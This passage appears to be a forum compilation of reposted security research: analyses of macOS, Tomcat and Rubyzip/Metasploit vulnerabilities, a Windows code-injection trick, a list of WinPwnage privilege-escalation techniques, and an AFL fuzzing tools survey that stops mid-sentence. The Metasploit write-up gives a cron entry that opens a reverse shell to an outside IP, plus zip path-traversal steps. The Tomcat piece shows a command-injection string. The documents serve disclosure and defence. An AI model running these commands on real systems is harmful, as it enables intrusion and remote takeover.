Detailed Analysis of macOS Vulnerability CVE-2019-8507 By Kai Lu | April 23, 2019 FortiGuard Labs Threat Analysis Report on an Memory Corruption Vulnerability in QuartzCore while Handling Shape Object. On March 25, 2019, Apple released macOS Mojave 10.14.4 and iOS 12.2. These two updates fixed a number of security vulnerabilities, including CVE-2019-8507 in QuartzCore (aka CoreAnimation), which I reported to Apple on January 3, 2019 using our FortiGuard Labs responsible disclosure process, read more. For more details on the Apple updates, please refer to https://support.apple.com/en-us/HT209600. In this blog I will provide a detailed analysis of this issue on macOS. Some of the analysis techniques used can be found in my previous blog, “Detailed Analysis of macOS/iOS Vulnerability CVE-2019-6231”. 0x01 A Quick Look QuartzCore, also known as CoreAnimation, is a framework used by macOS and iOS to create animatable scene graphics. CoreAnimation uses a unique rendering model where the graphics operations are run in a separate process. On macOS, the process is WindowServer. On iOS, the process is backboard. The service named com.apple.CARenderServer in QuartzCore is usually referenced as CARenderServer. This service exists in both macOS and iOS, and can be accessed from the Safari Sandbox. A memory corruption vulnerability exists when QuartzCore handles a shape object in the function CA::Render::Decoder::decode_shape() on macOS. This may lead to unexpected application termination. The following is the crash log of the WindowServer process when this issue is triggered. 0x02 Proof of Concept In this section I will demonstrate a PoC (Proof of Concept) used to trigger this issue. The PoC is shown below. A comparison between the original Mach message and the crafted Mach message is shown below. Figure 1. The diff between the crafted Mach message and the original Mach message Through binary diff, we only need to modify one byte at offset 0xB6 from 0x06 to 0x86 in order to trigger this issue. As shown in the PoC’s code, in order to send a crafted Mach message to trigger this issue, we first need to send a Mach message with msgh_id 40202 (the corresponding handler in the server is _XRegisterClient) to retrieve the connection ID for every newly-connected client. Once we get the value of the connection ID, we set this value at the corresponding offset (0x2C) in the crafted Mach message. Finally, we just send this Mach message to reproduce this vulnerability. 0x03 Analysis and Root of Cause In this section, I will dynamically debug this vulnerability with LLDB to determine the root cause. Note that you need to debug the WindowServer process via SSH mode. Based on the stack backtrace of the crashed thread from the crash log, we could set a conditional breakpoint at the function CA::Render::Server::ReceivedMessage::run_command_stream using the following commands. The value of conn_id can be obtained by setting a breakpoint at line 86 in the PoC’s C code. After this breakpoint is hit, we can read the buffer data of the crafted Mach message I sent. The register r13 points to the crafted Mach message. Figure 2. The crafted Mach message CARenderServer received The function CA::Render::Decoder::decode_object(CA::Render::Decoder *this, CA::Render::Decoder *a2) is used to decode all kinds of object data. The buffer data starting at offset 0x70000907dd52 is an Image object (marked in green). Figure 3. The crafted Mach message with an abnormal Image object The following code branch is used to parse the Image object data in the function CA::Render::Decoder::decode_object. Figure 4. The code branch to handle the Image object data Next, let’s take a closer look at how the Image object is handled. The following is the function CA::Render::Image::decode(). I add some comments that explain what each field in the Image object means. Figure 5. The function CA::Render::Image::decode() We can see that one byte at offset 0x70000907dd52 was mutated from 0x06 to 0x86. So the variable v4 is now equal to 0x86. The program could then jump to LABEL_31 to execute other branch codes because the variable v4 is larger than 0x20. At the end of LABEL_31, the program continues to handle the subsequent data that represents a Texture object by calling the function CA::Render::Texture::decode(CA::Render::Texture *this, CA::Render::Decoder *a2). Figure 6. The function CA::Render::Texture::decode We can see that it could invoke the function CA::Render::Decoder::decode_shape to handle the Shape object data. Let’s continue to trace how the next set of data is handled. Figure 7. The function CA::Render::Decoder::decode_shape We can see that the variable v2 is equal to 0x02. It could then allocate a buffer whose size is 8 bytes. Finally, it could invoke the function CA::Render::Decoder::decode_bytes to decode several bytes of data. And this function takes three parameters: The 2nd one points to the previous buffer allocated by the function malloc_zone_malloc. The 3rd one is a size_t type, and could be calculated by the expression “4LL * v2 – 12”, which obviously causes an integer overflow where the result is equal to 0xfffffffffffffffc. So when it calls the function bzero(), its first parameter points to a smaller buffer, but its second parameter is a super large unsigned 64-bits integer, which could lead to memory corruption. Figure 8. The function CA::Render::Decoder::decode_bytes The root cause of this issue is that it lacked a restricted bounds check in the function CA::Render::Decoder::decode_shape. Now that we have now finished the detailed analysis of this vulnerability, let’s look at how Apple fixed it. Figure 9. The comparison between before patch and after patch 0x04 Conclusion This vulnerability only affects macOS based on Apple’s security update. This issue exists in QuartzCore when handling shape object in the function CA::Render::Decoder::decode_shape() due to the lack of restricted input validation. Through a comparison between code before and after the patch, we can see that this issue was addressed with improved input validation. 0x05 Affected Versions macOS Mojave 10.14.2 macOS Mojave 10.14.3 0x06 Analysis Environment macOS 10.14.2 (18C54) MacBook Pro 0x07 Timeline Discovery date: January 1, 2019 Notification date: January 3, 2019 Confirmation date: March 20, 2019 Release date: March 25, 2019 0x08 Reference https://support.apple.com/en-us/HT209600 https://www.fortinet.com/blog/threat-research/detailed-analysis-of-macos-ios-vulnerability-cve-2019-6231.html Learn more about FortiGuard Labs and the FortiGuard Security Services portfolio. Sign up for the weekly FortiGuard Threat Intelligence Briefs. Learn more about the FortiGuard Security Rating Service, which provides security audits and best practices. Read more about our Network Security Expert program, Network Security Academy program or our FortiVets program. Sursa: https://www.fortinet.com/blog/threat-research/detailed-analysis-mac-os-vulnerability-cve-2019-8507.html
-
WordWarper – new code injection trick April 23, 2019 in Code Injection This is a trivial case of yet another functionality available that can help to execute code in a remote process. Same as with PROPagate technique, it only affects selected windows, but it can of course be used as an evasion, especially in early stages of compromise. Edit controls (including Rich Edit) are very common Windows controls present in most applications. They are either embedded directly, or as subclassed windows. When they display text in multiline mode they use so-called EditWordBreakProc callback function. Anytime the control needs to do something related to word wrapping the procedure will be called. One can modify this function for any window by sending EM_SETWORDBREAKPROC message to it. If windows is an Edit control or its descendant, funny things may happen. In order to see which windows are susceptible to such modification I created a simple demo program that basically sends this message to every window on my desktop. After looking around and running some potential victim programs I quickly found a good candidate to demo the technique: The Sticky Notes (StikyNot). I ran it under the debugger to catch the moment it crashes, and then ran my test program. It changed the procedure for every window to 0x12345678. And this is what happens when you start typing in Sticky Notes after the procedure was changed: I bet there are more programs that can be targeted this way, but as usual, I leave it as a home work to the reader Sursa: http://www.hexacorn.com/blog/2019/04/23/wordwarper-new-code-injection-trick/
-
WinPwnage The goal of this repo is to study the Windows penetration techniques. Techniques are found online, on different blogs and repos here on GitHub. I do not take credit for any of the findings, thanks to all the researchers. UAC bypass techniques: UAC bypass using fodhelper UAC bypass using computerdefaults UAC bypass using slui UAC bypass using silentcleanup UAC bypass using compmgmtlauncher UAC bypass using sdclt (isolatedcommand) UAC bypass using sdclt (App Paths) UAC bypass using perfmon UAC bypass using eventviewer UAC bypass using sysprep (dll payload supported) UAC bypass using migwiz (dll payload supported) UAC bypass using mcx2prov (dll payload supported) UAC bypass using cliconfg (dll payload supported) UAC bypass using token manipulation UAC bypass using sdclt and Folder class UAC bypass using cmstp UAC bypass using .NET Code Profiler (dll payload supported) UAC bypass using mocking trusted directories (dll payload supported) UAC bypass using wsreset Persistence techniques: Persistence using userinit key Persistence using image file execution option and magnifier Persistence using hkey_local_machine run key Persistence using hkey_current_user run key Persistence using schtask (SYSTEM privileges) Persistence using explorer dll hijack Persistence using mofcomp and mof file (SYSTEM privileges) Persistence using wmic (SYSTEM privileges) Persistence using startup files Persistence using Cortana App Persistence using People App Persistence using bitsadmin Persistence using Windows Service (SYSTEM privileges) Elevation techniques: Elevate from administrator to NT AUTHORITY SYSTEM using handle inheritance Elevate from administrator to NT AUTHORITY SYSTEM using named pipe impersonation Elevate from administrator to NT AUTHORITY SYSTEM using token impersonation Elevate from administrator to NT AUTHORITY SYSTEM using schtasks (non interactive) Elevate from administrator to NT AUTHORITY SYSTEM using wmic (non interactive) Elevate from administrator to NT AUTHORITY SYSTEM using windows service (non interactive) Execution techniques: Execute payload by calling the RegisterOCX function in Advpack.dll Execute payload using appvlp binary Execute payload from bash.exe if linux subsystem is installed Execute payload using diskshadow.exe from a prepared diskshadow script Execute payload as a subprocess of Dxcap.exe Execute payload since there is a match for notepad.exe in the system directory Execute payload using ftp binary Execute payload by calling the RegisterOCX function in ieadvpack.dll Execute payload by calling OpenURL in ieframe.dll Execute payload using the Program Compatibility Assistant Execute payload by calling the LaunchApplication function Execute payload by calling OpenURL in shdocvw.dll Execute payload using sqltoolsps binary Execute payload by calling OpenURL in url.dll Execute payload as a subprocess of vsjitdebugger.exe Execute payload by calling RouteTheCall in zipfldr.dll Installing the Dependencies: pip install -r requirements.txt Build with py2exe: In order for a successful build, install the py2exe (http://www.py2exe.org) module and use the provided build.py script to compile all the scripts in to a portable executable. This only seems to work on Python 2, not on Python 3. python build.py winpwnage.py Build with PyInstaller: This build works on both Python 2 and Python 3 and puts the .exe file into the dist directory. pip install pyinstaller pyinstaller --onefile winpwnage.py On Windows 10, Access Denied errors can accure while compiling, rerun until success or elevate the prompt. Read: https://wikileaks.org/ciav7p1/cms/page_2621770.html https://wikileaks.org/ciav7p1/cms/page_2621767.html https://wikileaks.org/ciav7p1/cms/page_2621760.html https://msdn.microsoft.com/en-us/library/windows/desktop/bb736357(v=vs.85).aspx https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ https://github.com/winscripting/UAC-bypass/ https://www.greyhathacker.net/?p=796 https://github.com/hfiref0x/UACME https://bytecode77.com/hacking/exploits/uac-bypass/performance-monitor-privilege-escalation https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20workshops/DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day-All-Day.pdf https://lolbas-project.github.io Sursa: https://github.com/rootm0s/WinPwnage
-
Uncovering CVE-2019-0232: A Remote Code Execution Vulnerability in Apache Tomcat Posted on:April 24, 2019 at 4:57 am Posted in:Vulnerabilities Author: Trend Micro by Santosh Subramanya and Raghvendra Mishra Apache Tomcat, colloquially known as Tomcat Server, is an open-source Java Servlet container developed by a community with the support of the Apache Software Foundation (ASF). It implements several Java EE specifications, including Java Servlet, JavaServer Pages (JSP), Java Expression Language (EL), and WebSocket, and provides a “pure Java” HTTP web server environment in which Java code can run. On April 15, Nightwatch Cybersecurity published information on CVE-2019-0232, a remote code execution (RCE) vulnerability involving Apache Tomcat’s Common Gateway Interface (CGI) Servlet. This high severity vulnerability could allow attackers to execute arbitrary commands by abusing an operating system command injection brought about by a Tomcat CGI Servlet input validation error. This blog entry delves deeper into this vulnerability by expounding on what it is, how it can be exploited, and how it can be addressed. Understanding CVE-2019-0232 The CGI is a protocol that is used to manage how web servers interact with applications. These applications, called CGI scripts, are used to execute programs external to the Tomcat Java virtual machine (JVM). The CGI Servlet, which is disabled by default, is used to generate command line parameters generated from a query string. However, Tomcat servers running on Windows machines that have the CGI Servlet parameter enableCmdLineArguments enabled are vulnerable to remote code execution due to a bug in how the Java Runtime Environment (JRE) passes command line arguments to Windows. In Apache Tomcat, the file web.xml is used to define default values for all web applications loaded into a Tomcat instance. The CGI Servlet is one of the servlets provided as default. This servlet supports the execution of external applications that conform to the CGI specification. Typically, the CGI Servlet is mapped to the URL pattern “/cgi-bin/*”, meaning any CGI applications that are executed must be present within the web application. A new process in Windows OS is launched by calling the CreateProcess() function, which takes the following command line as a string (the lpComandLine parameter to CreateProcess😞 int CreateProcess( …, lpComandLine, … ) In Windows, arguments are not passed separately as an array of strings but rather in a single command-line string. This requires the program to parse the command line itself by extracting the command line string using GetCommandLine() API and then parsing the arguments string using CommandLineArgvW() helper function. This is depicted in the flowchart shown below: Cmdline = “program.exe hello world” Figure 1. Command line string for Windows Argv[0]->program.exe Argv[1]->hello Argv[2]->world The vulnerability occurs due to the improper passing of command line arguments from JRE to Windows. For Java applications, ProcessBuilder() is called before CreateProcess() function kicks in. The arguments are then passed to the static method start of ProcessImpl(), which is a platform-dependent class. In the Windows implementation of ProcessImpl(), the start method calls the private constructor of ProcessImpl(), which creates the command line for the CreateProcess call. Figure 2. Command line string for Java apps ProcessImpl() builds the Cmdline and passes it to the CreateProcess() Windows function, after which CreateProcess() executes the .bat and .cmd files in a cmd.exe shell environment. If the file that is to be run contains a .bat or .cmd extension, the image to be run then becomes cmd.exe, the Windows command prompt. CreateProcess() then restarts at Stage 1, with the name of the batch file being passed as the first parameter to cmd.exe. This results in a ‘hello.bat …’ becoming ‘C:\Windows\system32\cmd.exe /c “hello.bat …”‘. Because the quoting rules for CommandLineToArgvW differ from those of cmd’s, this means that an additional set of quoting rules would need to be applied to avoid command injection in the command line interpreted by cmd.exe. Since Java (ProcessImpl()) does no additional quoting for this implicit cmd.exe call promotion on the passed arguments, arguments processed by cmd.exe is now used to execute, presenting inherent issues if arguments are not passed to cmd.exe properly. Argument parsing by cmd.exe We begin with the understanding that cmd is essentially a text preprocessor: Given a command line, it makes a series of textual transformations then hands the transformed command line to CreateProcess(). Some transformations replace environment variable names with their values. Transformations such as those triggered by the &, ||, && operators, split command lines into several parts. All of cmd’s transformations are triggered by the presence of one of the following metacharacters: (, ), %, !, ^, “, <, >, &, and |. The metacharacter “ is particularly interesting: When cmd is transforming a command line and sees a “, it copies a “ to the new command line then begins copying characters from the old command line to the new one without seeing whether any of these characters is a metacharacter. This continues until cmd either reaches the end of the command line, runs into a variable substitution, or sees another “. If we rely on cmd’s “-behavior to protect arguments, using quotation marks will produce unexpected behavior. By passing untrusted data as command line parameters, the bugs caused by this convention mismatch become a security issue. Take for example, the following: hello.bat “dir \”&whoami” 0: [hello.bat] 1: [&dir] Here, cmd is interpreting the & metacharacter as a command separator because, from its point of view, the & character lies outside the quoted region. In this scenario, ‘whoami’ can be replaced by any number of harmful commands. When running the command shown above with hello.bat, we get the following output. Figure 3. The resulting output when running “hello.bat” The issue shown in the screenshot is used in Apache Tomcat to successfully perform command execution, which is shown in the following image: Figure 4. Performing command execution in Apache Tomcat To successfully perform command injection, we need to add a few parameters and enable CGI Servlet in the web.xml file. Figure 5. Snapshot of web.xml The Apache Software Foundation has introduced a new parameter, cmdLineArgumentsDecoded, in Apache Tomcat CGI Servlet that is designed to address CVE-2019-0232. cmdLineArgumentsDecoded is only used when enableCmdLineArguments is set to true. It defines a regex pattern “[[a-zA-Z0-9\Q-_.\\/:\E]+]” that individual decoded command line arguments must match or else the request will be rejected. The introduced patch will eliminate the vulnerability that arises from using spaces and double quotes in command line arguments. Figure 6. The Apache Tomcat patch, which can be found in the codebase Recommendations and Trend Micro Solutions Apache Software Foundation recommends that users running Apache Tomcat upgrade their software to the latest versions: Version Recommended Patch Apache Tomcat 9 Apache Tomcat 9.0.18 or later Apache Tomcat 8 Apache Tomcat 8.5.40 or later Apache Tomcat 7 Apache Tomcat 7.0.93 or later Furthermore, users should set the CGI Servlet initialization parameter enableCmdLineArguments to false to prevent possible exploitation of CVE-2019-0232. Developers, programmers, and system administrators using Apache Tomcat can also consider multilayered security technology such as Trend Micro™ Deep Security™ and Vulnerability Protection solutions, which protect user systems from threats that may exploit CVE-2019-0232 via the following Deep Packet Inspection (DPI) rule: 1009697 – Apache Tomcat Remote Code Execution Vulnerability (CVE-2019-0232) Trend Micro TippingPoint® Threat Protection System customers are protected from attacks that exploit CVE-2019-0232 via the following MainlineDV filter: 315387 – HTTP: Apache Tomcat Remote Code Execution on Windows Sursa: https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
-
On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624) 24 Apr 2019 - Posted by Luca Carettoni During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation. This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit. Rubyzip and old vulnerabilities The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers. # Extracts entry to file dest_path (defaults to @name). # NB: The caller is responsible for making sure dest_path is safe, # if it is passed. def extract(dest_path = nil, &block) if dest_path.nil? && !name_safe? puts "WARNING: skipped #{@name} as unsafe" return self end [...] Entry#name_safe is defined a few lines before as: # Is the name a relative path, free of `..` patterns that could lead to # path traversal attacks? This does NOT handle symlinks; if the path # contains symlinks, this check is NOT enough to guarantee safety. def name_safe? cleanpath = Pathname.new(@name).cleanpath return false unless cleanpath.relative? root = ::File::SEPARATOR naive_expanded_path = ::File.join(root, cleanpath.to_s) cleanpath.expand_path(root).to_s == naive_expanded_path end In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility: # NB: The caller is responsible for making sure dest_path is safe, if it is passed. While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments. In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code: require 'zip' first_arg, *the_rest = ARGV Zip::File.open(first_arg) do |zip_file| zip_file.each do |entry| puts "Extracting #{entry.name}" entry.extract(entry.name) end end $ ls /tmp/file.txt ls: cannot access '/tmp/file.txt': No such file or directory $ zipinfo absolutepath.zip Archive: absolutepath.zip Zip file size: 289 bytes, number of entries: 2 drwxr-xr-x 2.1 unx 0 bx stor 18-Jun-13 20:13 /tmp/ -rw-r--r-- 2.1 unx 5 bX defN 18-Jun-13 20:13 /tmp/file.txt 2 files, 5 bytes uncompressed, 7 bytes compressed: -40.0% $ ruby Rubyzip-poc.rb absolutepath.zip Extracting /tmp/ Extracting /tmp/file.txt $ ls /tmp/file.txt /tmp/file.txt Resulting in a file being created in /tmp/file.txt, which confirms the issue. As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase. It would have been vulnerable anyway ¯\_(ツ)_/¯ In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code: def unzip(input) uuid = get_uuid() # 0. create a 'Pathname' object with the new uuid parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}") Zip::File.open(input[:zip_file].to_io) do |zip_file| zip_file.each_with_index do |entry, index| # 1. check the file is not present next if File.file?(parent_directory + entry.name) # 2. extract the entry entry.extract(parent_directory + entry.name) end end Success end In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior. We can easily understand its behavior in an IRB shell: $ irb irb(main):001:0> require 'pathname' => true irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/") => #<Pathname:/tmp/random_uuid/> irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal")) => #<Pathname:/path> irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal") => #<Pathname:/path/traversal> irb(main):005:0> parent_directory + "../../path/traversal" => #<Pathname:/path/traversal> Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation. From Arbitrary File Write to RCE (RoR Style) Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application. Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot. However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability. The official documentation explains that: After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded. Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot. Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624) Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File: data.entries.each do |e| target = ::File.join(@import_filedata[:zip_tmp], e.name) data.extract(e,target) As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps: Create a file with the following content: * * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196" Generate the ZIP archive with the path traversal payload: python evilarc.py exploit --os unix -p etc/cron.d/ Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive) Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell) Login in the MSF Web Interface Create a new “Project” Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button Wait for the import process to finish Enjoy your reverse shell Conclusions In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract. Here is a small recap of the different scenarios (as of Rubyzip v1.2.2😞 Usage Input by user? Vulnerable to path traversal? entry.extract(path) yes (path) yes entry.extract(path) partially (path is concatenated) maybe entry.extract() partially (entry name) no entry.extract() no no If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624. Credits and References Credit for the research and bugs go to @voidsec and @polict. This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support. If you’re interested in the topic, take a look at the following resources: Rubyzip Library Ruby on Rails Guides Attacking Ruby on Rails Applications 1997 Portable BBS Hacking (or when Zip Slip was actually invented) Evilarc blog post (or 2019 and this post is still relevant) Sursa: https://blog.doyensec.com/2019/04/24/rubyzip-bug.html
-
- 1
-
-
d1g1 вчера в 05:00 Zoo AFL Блог компании «Digital Security», Информационная безопасность In this article, we're going to talk about not the classical AFL itself but about utilities designed for it and its modifications, which, in our view, can significantly improve the quality of fuzzing. If you want to know how to boost AFL and how to find more vulnerabilities faster – keep on reading! What is AFL and What is it Good for? AFL is a coverage-guided, or feedback-based, fuzzer. More about these concepts can be found in a cool paper, “Fuzzing: Art, Science, and Engineering”. Let's wrap up general information about AFL: It modifies the executable file to find out how it influences coverage. Mutates input data to maximize coverage. Repeats the preceding step to find where the program crashes. It’s highly effective, which is proven by practice. It’s very easy to use. Here's a graphic representation: If you don't know what AFL is, here is a list of helpful resources for you to start: The official page of the project. afl-training — a short intro to AFL. afl-demo — a simple demo of fuzzing C++ programs with AFL. afl-cve — a collection of the vulnerabilities found with AFL (hasn't been updated since 2017). Here you can read about the stuff AFL adds to a program during its build. A few useful tips about fuzzing network applications. At the moment this article was being written, the latest version of AFL was 2.52b. The fuzzer is in active development, and with time some side developments are being incorporated into the main AFL branch and grow irrelevant. Today, we can name several useful accessory tools, which are listed in the following chapter. Rode0day competition Some AFL users noted that its author, Michal Zalewski, had apparently abandoned the project since the last modifications date to November 5, 2017. This may be connected to him leaving Google and working on some new projects. So, users started to make new patches themselves for the last current version 2.52b. There are also different variations and derivates of AFL, which allows fuzzing Python, Go, Rust, OCaml, GCJ Java, kernel syscalls, or even entire VMs. AFL for other programming languages Accessory tools For this chapter, we've collected various scripts and tools for AFL and divided them into several categories: Crash processing afl-utils — a set of utilities for automatic processing/analysis of crashes and reducing the number of test cases. afl-crash-analyzer — another crash analyzer for AFL. fuzzer-utils — a set of scripts for the analysis of results. atriage — a simple triage tool. afl-kit — afl-cmin on Python. AFLize — a tool that automatically generates builds of debian packages suitable for AFL. afl-fid — a set of tools for working with input data. Work with code coverage afl-cov — provides human-friendly data about coverage. count-afl-calls — ratio assessment. Script counts the number of instrumentation blocks in the binary. afl-sancov — is like afl-cov but uses a clang sanitizer. covnavi — a script for covering code and analysis by Cisco Talos Group. LAF LLVM Passes — something like a collection of patches for AFL that modify the code to make it easier for the fuzzer to find branches. A few scripts for the minimization of test cases afl-pytmin — a wrapper for afl-tmin that tries to speed up the process of the minimization of test case by using many CPU cores. afl-ddmin-mod — a variation of afl-tmin based on the ddmin algorithm. halfempty — is a fast utility for minimizing test cases by Tavis Ormandy based on parallelization. Distributed execution disfuzz-afl — distributed fuzzing for AFL. AFLDFF — AFL distributed fuzzing framework. afl-launch — a tool for the execution of many AFL instances. afl-mothership — management and execution of many synchronized AFL fuzzers on AWS cloud. afl-in-the-cloud — another script for running AFL in AWS. VU_BSc_project — fuzzing testing of the open source libraries with libFuzzer and AFL. Recently, there has been published a very good article titled “Scaling AFL to a 256 thread machine”. Deployment, management, monitoring, reporting afl-other-arch — is a set of patches and scripts for easily adding support for various non-x86 architectures for AFL. afl-trivia — a few small scripts to simplify the management of AFL. afl-monitor — a script for monitoring AFL. afl-manager — a web server on Python for managing multi-afl. afl-tools — an image of a docker with afl-latest, afl-dyninst, and Triforce-afl. afl-remote — a web server for the remote management of AFL instances. AFL Modifications AFL had a very strong impact on the community of vulnerability researchers and fuzzing itself. It's not surprising at all that after some time people started making modifications inspired by the original AFL. Let's have a look at them. In different situations, each of these modifications has its own pros and cons compared to the original AFL. Almost all mods can be found at hub.docker.com hub.docker.com What for? Increase the speed and/or code coverage Algorithms Environment OS Hardware Working without source code Code emulation Code instrumentation Static Dynamic Default modes of AFL operation Before going on with examining different modifications and forks of AFL, we have to talk about two important modes, which also had been modifications in the past but were eventually incorporated. They are Syzygy and Qemu. Syzygy mode — is the mode of working in instrument.exe instrument.exe --mode=afl --input-image=test.exe --output-image=test.instr.exe Syzygy allows to statically rewrite PE32 binaries with AFL but requires symbols and an additional dev to make WinAFL kernel aware. Qemu mode — the way it works under QEMU can be seen in “Internals of AFL fuzzer — QEMU Instrumentation”. The support of working with binaries with QEMU was added to upstream AFL in Version 1.31b. AFL QEMU mode works with the added functionality of binary instrumentation into qemu tcg (a tiny code generator) binary translation engine. For that, AFL has a build script qemu, which extracts the sources of a certain version of qemu (2.10.0), puts them onto several small patches and builds for a defined architecture. Then, a file called afl-qemu-trace is created, which is in fact a file of user mode emulation of (emulation of only executable ELF files) qemu-. Thus, it is possible to use fuzzing with feedback on elf binaries for many different architectures supported by qemu. Plus, you get all the cool AFL tools, from the monitor with information about the current session to advanced stuff like afl-analyze. But you also get the limitations of qemu. Also, if a file is built with toolchain using hardware SoC features, which launches the binary and is not supported by qemu, fuzzing will be interrupted as soon as there is a specific instruction or a specific MMIO is used. Here's another interesting fork of the qemu mode, where the speed was increased 3-4 times with TCG code instrumentation and cashing. Forks The appearance of forks of AFL is first of all related to the changes and improvements of the algorithms of the classic AFL. pe-afl — A modification for fuzzing PE files that have no source code in the Windows OS. For its operation, the fuzzer analyzes a target program with IDA Pro and generates the information for the following static instrumentation. An instrumented version is then fuzzed with AFL. afl-cygwin — is an attempt to port the classic AFL to Windows with Cygwin. Unfortunately, it has many bugs, it's very slow, and the development of has been abandoned. AFLFast (extends AFL with Power Schedules) — one of the first AFL forks. It has added heuristics, which allow it to go through more paths in a short time period. FairFuzz — an extension for AFL, that targets rare branches. AFLGo — is an extension for AFL meant for getting to certain parts of code instead of full program coverage. It can be used for testing patches or newly added fragments of code. PerfFuzz — an extension for AFL, that looks for test cases which could significantly slow down the program. Pythia — is an extension for AFL that is meant to forecast how hard it is to find new paths. Angora — is one of the latest fuzzers, written on rust. It uses new strategies for mutation and increasing the coverage. Neuzz — fuzzing with neural netwoks. UnTracer-AFL — integration of AFl with UnTracer for effective tracing. Qsym — Practical Concolic Execution Engine Tailored for Hybrid Fuzzing. Essentially, it is a symbolic execution engine (basic components are realized as a plugin for intel pin) that together with AFL performs hybrid fuzzing. This is a stage in the evolution of feedback-based fuzzing and calls for a separate discussion. Its main advantage is that can do concolic execution relatively fast. This is due to the native execution of commands without intermediate representation of code, snapshots, and some heuristics. It uses the old Intel pin (due to support problems between libz3 and other DBTs) and currently can work with elf x86 and x86_64 architectures. Superion — Greybox fuzzer, an obvious advantage of which is that along with an instrumented program it also gets specification of input data using the ANTLR grammar and after that performs mutations with the help of this grammar. AFLSmart — Another Graybox fuzzer. As input, it gets specification of input data in the format used by the Peach fuzzer. There are many research papers dedicated to the implementation of the new approaches and fuzzing techniques where AFL is modified. Only white papers are available, so we didn't even bother mentioning those. You can google them if you want. For example, some of the latest are CollAFL: Path Sensitive Fuzzing, EnFuzz, «Efficient approach to fuzzing interpreters», ML for AFL. Modifications based on Qemu TriforceAFL — AFL/QEMU fuzzing with full emulation of a system. A fork by nccgroup. Allows fuzzing the entire OS in qemu mode. It is realized with a special instruction (aflCall (0f 24)), which was added in QEMU x64 CPU. Unfortunately, it's no longer supported; the last version of AFL is 2.06b. TriforceLinuxSyscallFuzzer — the fuzzing of Linux system calls. afl-qai — a small demo project with QEMU Augmented Instrumentation (qai). A modification based on KLEE kleefl — for generating test cases by means of symbolic execution (very slow on big programs). A modification based on Unicorn afl-unicorn — allows for fuzzing of fragments of code by emulating it on Unicorn Engine. We successfully used this variation of AFL in our practice, on the areas of the code of a certain RTOS, which was executed on SOC, so we couldn't use QEMU mode. The use of this modification is justified in the case when we don't have sources (we can't build a stand-alone binary for the analysis of the parser) and the program doesn't take input data directly (for example, data is encrypted or is signal sample like in a CGC binary), then we can reverse and find the supposed places-functions, where the data is procced in a format convenient for the fuzzer. This is the most general/universal modification of AFL, i.e. it allows fuzzing anything. It's independent of architecture, sources, input data format, and binary format (the most striking example of bare-metal — just fragments of code from the controller's memory). The researcher first examines this binary and writes a fuzzer, which emulates the state at the input of the parser procedure. Obviously, unlike AFL, this requires a certain examination of binary. For bare-metal firmware, like Wi-FI or 